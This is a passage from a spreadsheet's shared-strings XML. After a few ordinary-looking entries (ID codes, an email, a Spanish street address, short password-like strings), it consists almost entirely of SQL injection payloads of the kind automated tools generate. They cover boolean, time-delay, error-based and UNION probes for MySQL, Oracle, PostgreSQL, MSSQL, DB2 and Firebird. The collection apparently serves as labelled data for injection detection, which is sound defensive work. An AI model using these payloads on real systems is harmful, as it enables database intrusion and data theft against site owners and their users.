  </si>
  <si>
    <t>compte</t>
  </si>
  <si>
    <t>24596413y</t>
  </si>
  <si>
    <t>elder@parcalia.hn</t>
  </si>
  <si>
    <t>46942381w</t>
  </si>
  <si>
    <t>b3r3al</t>
  </si>
  <si>
    <t>calle valencia de don juan 161, 7?d</t>
  </si>
  <si>
    <t>ejerci78</t>
  </si>
  <si>
    <t>99745017c</t>
  </si>
  <si>
    <t>-9456%'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1%'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select wjpc where 5943 = 5943 and make_set ( 8403 = 8403,8899  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   as rwsn where 9946 = 9946 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1" )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "fpqh" = "fpqh</t>
  </si>
  <si>
    <t>1%" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "%" = "</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'fegp' = 'fegp</t>
  </si>
  <si>
    <t>-8609%"  )  )   )  union all select 6021,6021,6021,6021,6021,6021--</t>
  </si>
  <si>
    <t>1 )  where 2918 = 2918 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1'  )  )   )  and sleep ( 5 )  and   (  (   ( 'vbck' like 'vbck</t>
  </si>
  <si>
    <t>1" )  where 8153 = 8153</t>
  </si>
  <si>
    <t>-6851' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t xml:space="preserve">-5703' )  or elt ( 2972 = 8708,8708 ) </t>
  </si>
  <si>
    <t>-5089'  )  )   as icbb where 1129 = 1129 or 6250 = 9650</t>
  </si>
  <si>
    <t>1' where 9116 = 9116 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "jgoq" = "jgoq</t>
  </si>
  <si>
    <t>1'+ ( select ntym where 4750 = 4750</t>
  </si>
  <si>
    <t>-9133"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>1" )  as jmwr where 5978 = 5978 rlike  ( select  ( case when  ( 1396 = 8762 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 rlike sleep ( 5 ) </t>
  </si>
  <si>
    <t>1%' )  and 8734 = 5844</t>
  </si>
  <si>
    <t>1"  )  )   as hace where 8785 = 8785</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'jloi' = 'jloi</t>
  </si>
  <si>
    <t xml:space="preserve">1',iif ( 6625 = 6625,1,1/0 ) </t>
  </si>
  <si>
    <t>-6760 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +</t>
  </si>
  <si>
    <t xml:space="preserve">1"  )  )   ) </t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( "asvy" = "asvy</t>
  </si>
  <si>
    <t>-9150%'  )  )   )  union all select 7057,7057,7057,7057,7057,7057,7057,7057--</t>
  </si>
  <si>
    <t>1'  )  )   as hmyc where 6732 = 6732 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 8167 = 8167</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 'javh' = 'javh</t>
  </si>
  <si>
    <t>1  )  )   as queb where 2449 = 2449 union all select null,null#</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  as zmxb where 8424 = 8424 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'qtep' where 2572 = 2572 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1%" order by 1--</t>
  </si>
  <si>
    <t>1' )  where 4786 = 4786 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-8045  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( "fkmh" = "fkmh</t>
  </si>
  <si>
    <t>-4954%" )  or 5244 = 4832</t>
  </si>
  <si>
    <t>1 where 6040 = 6040 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and elt ( 1210 = 1210,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1 )  union all select null--</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 )  where 9683 = 9683</t>
  </si>
  <si>
    <t>-1504" )  as wpes where 6256 = 6256 union all select 6256,6256,6256,6256,6256,6256,6256,6256,6256,6256#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'fpfl' from dual where 1434 = 1434 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>1%"  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-2033" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  as chla where 6098 = 6098</t>
  </si>
  <si>
    <t>1" where 7344 = 7344 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1' where 1045 = 1045 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-4215 )  where 5782 = 5782 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 1</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( case when 2872 = 2872 then 1 else null end ) </t>
  </si>
  <si>
    <t>1 where 9932 = 9932</t>
  </si>
  <si>
    <t>-2898" where 3301 = 3301 union all select 3301,3301,3301,3301,3301,3301,3301,3301,3301,3301#</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'nlnk' like 'nlnk</t>
  </si>
  <si>
    <t>-6363" )  where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--</t>
  </si>
  <si>
    <t>-7710' where 5658 = 5658 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1 where 4985 = 4985 order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> end and "%" = "</t>
  </si>
  <si>
    <t>1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'ucpa' = 'ucpa</t>
  </si>
  <si>
    <t>1'  )  )   as hqhs where 5383 = 5383</t>
  </si>
  <si>
    <t>1 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # cgow</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'yxpi' = 'yxpi</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ynwr" like "ynwr</t>
  </si>
  <si>
    <t>1"  )  )   as gprr where 5975 = 5975 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 )  where 1622 = 1622</t>
  </si>
  <si>
    <t>1%'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "%" = "</t>
  </si>
  <si>
    <t>-6085 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113</t>
  </si>
  <si>
    <t>1" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "mlld" like "mlld</t>
  </si>
  <si>
    <t>1  )  )   as wwys where 9248 = 9248</t>
  </si>
  <si>
    <t>-4586 union all select 2068,2068,2068,2068--</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>1' )  as idqc where 5288 = 5288 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' in boolean mode )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1' )  where 7322 = 7322 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  where 6634 = 6634 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1%' )  and 7533 = 7533 and  ( '%' = '</t>
  </si>
  <si>
    <t>1" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "zzkc" = "zzkc</t>
  </si>
  <si>
    <t>1  )  )   as gdcg where 2329 = 2329 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' and make_set ( 9860 = 6956,6956 )  and 'toru' = 'toru</t>
  </si>
  <si>
    <t>-3827" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'hbld' = 'hbld</t>
  </si>
  <si>
    <t>1' where 1593 = 1593</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'vjhw' like 'vjhw</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 5340 = 5340</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( "lsvg" like "lsvg</t>
  </si>
  <si>
    <t>-2197' union all select 8065,8065,8065,8065--</t>
  </si>
  <si>
    <t xml:space="preserve"> end ) +'</t>
  </si>
  <si>
    <t>1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- ztzu</t>
  </si>
  <si>
    <t>1'  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>1'  )  )   as jntr where 5051 = 5051 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1'+ ( select pdfv where 1172 = 1172 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' and elt ( 9371 = 8882,8882 )  and 'vurh' = 'vurh</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'qfxg' = 'qfxg</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5334 = 4976 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( "eboa" like "eboa</t>
  </si>
  <si>
    <t>-9175'  )  )   union all select 6174,6174,6174,6174--</t>
  </si>
  <si>
    <t>1' )  where 1917 = 1917 union all select null#</t>
  </si>
  <si>
    <t>-4929" where 6381 = 6381 or 8571 = 8571--</t>
  </si>
  <si>
    <t>-3846%' or 6872 = 6872 and '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select somn where 8636 = 8636 rlike sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>-1459'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'eiet' like 'eiet</t>
  </si>
  <si>
    <t>1' where 9416 = 9416</t>
  </si>
  <si>
    <t>1 )  where 2223 = 2223</t>
  </si>
  <si>
    <t>1 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- cbsd</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 where 7757 = 7757 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'dfmw' from dual where 1723 = 1723</t>
  </si>
  <si>
    <t>1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'sqbr' = 'sqbr</t>
  </si>
  <si>
    <t xml:space="preserve">-6798%"  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1'+ ( select 'dbvq' where 2045 = 2045 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1'|| ( select 'bgdh' from dual where 1967 = 1967</t>
  </si>
  <si>
    <t>1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'rjjo' = 'rjjo</t>
  </si>
  <si>
    <t>1%'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select sleep ( 5 ) # wihl</t>
  </si>
  <si>
    <t>-5116 )  or  ( 8287 = 4930 ) *4930</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'unko' = 'unko</t>
  </si>
  <si>
    <t>1'  )  )   as dipp where 1714 = 1714</t>
  </si>
  <si>
    <t>1%"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as joco where 2922 = 2922</t>
  </si>
  <si>
    <t>1%" )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  as xskm where 3525 = 3525 and 2435 = 6513</t>
  </si>
  <si>
    <t>1' rlike sleep ( 5 )  and 'ojqz' like 'ojqz</t>
  </si>
  <si>
    <t>1'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'dssx' like 'dssx</t>
  </si>
  <si>
    <t>-4373%"  )  )   or 5672 = 5188--</t>
  </si>
  <si>
    <t>-7433"  )  )   as zsnt where 2513 = 2513 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1' )  where 6746 = 6746 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2542 = 7042--</t>
  </si>
  <si>
    <t>1" )  and 2006 = 2006</t>
  </si>
  <si>
    <t>-1503" order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( case when 5640 = 5640 then 5640 else null end ) </t>
  </si>
  <si>
    <t xml:space="preserve">-1638' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 6205 = 1384 )  then 1 else 0x28 end  )  )   and   (  (  'ahjf' = 'ahjf</t>
  </si>
  <si>
    <t>1%' )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   as cdhd where 2958 = 2958 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7725%'  )  )   union all select 4559,4559,4559,4559,4559,4559,4559,4559,4559--</t>
  </si>
  <si>
    <t>1'  )  )   as yyrx where 5600 = 5600</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-8046"  )  )   )  union all select 3126,3126,3126,3126,3126,3126,3126,3126,3126#</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  'oucg' = 'oucg</t>
  </si>
  <si>
    <t>1%' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-1629'  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1" where 5927 = 5927</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-9408%"  )  )   union all select 1841,1841,1841,1841,1841,1841--</t>
  </si>
  <si>
    <t>-4550" )  as hlwe where 6026 = 6026 or  ( 9364 = 9593 ) *9593--</t>
  </si>
  <si>
    <t>select  ( case when  ( 7254 = 5901 )  then 1 else 7254* ( select 7254 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'ozur' = 'ozur</t>
  </si>
  <si>
    <t>1%" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'wtdz' from dual where 1866 = 1866 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "nkgd" = "nkgd</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 5855 = 7142 )  then 1 else 0x28 end  )  )   and   (  (   ( 'fkhd' = 'fkhd</t>
  </si>
  <si>
    <t>1%" or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  as qirf where 6200 = 6200  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1 )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-3597'  )  )   order by 1--</t>
  </si>
  <si>
    <t>1" where 2878 = 2878 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">-7773' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  where 7588 = 7588 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5928"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "rggt" like "rggt</t>
  </si>
  <si>
    <t>-2787'  )  )   union all select 1996,1996,1996,1996,1996,1996,1996,1996#</t>
  </si>
  <si>
    <t>1" )  where 2473 = 2473 and make_set ( 6118 = 7684,7684 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "gfwz" = "gfwz</t>
  </si>
  <si>
    <t>-9875' )  or  ( 8459 = 8459 ) *4906 and  ( 'mrxw' = 'mrxw</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">1" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1' or elt ( 6272 = 6272,sleep ( 5  )  )   and 'wdoi' = 'wdoi</t>
  </si>
  <si>
    <t>1" and 4288 = 3696 and "qqam" like "qqam</t>
  </si>
  <si>
    <t>1" )  as fgne where 7207 = 7207</t>
  </si>
  <si>
    <t>1'  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-6335"  )  )   )  union all select 3654--</t>
  </si>
  <si>
    <t>-3609"  )  )   as fzyp where 9474 = 9474 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1" where 4066 = 4066 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1' )  where 3331 = 3331 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
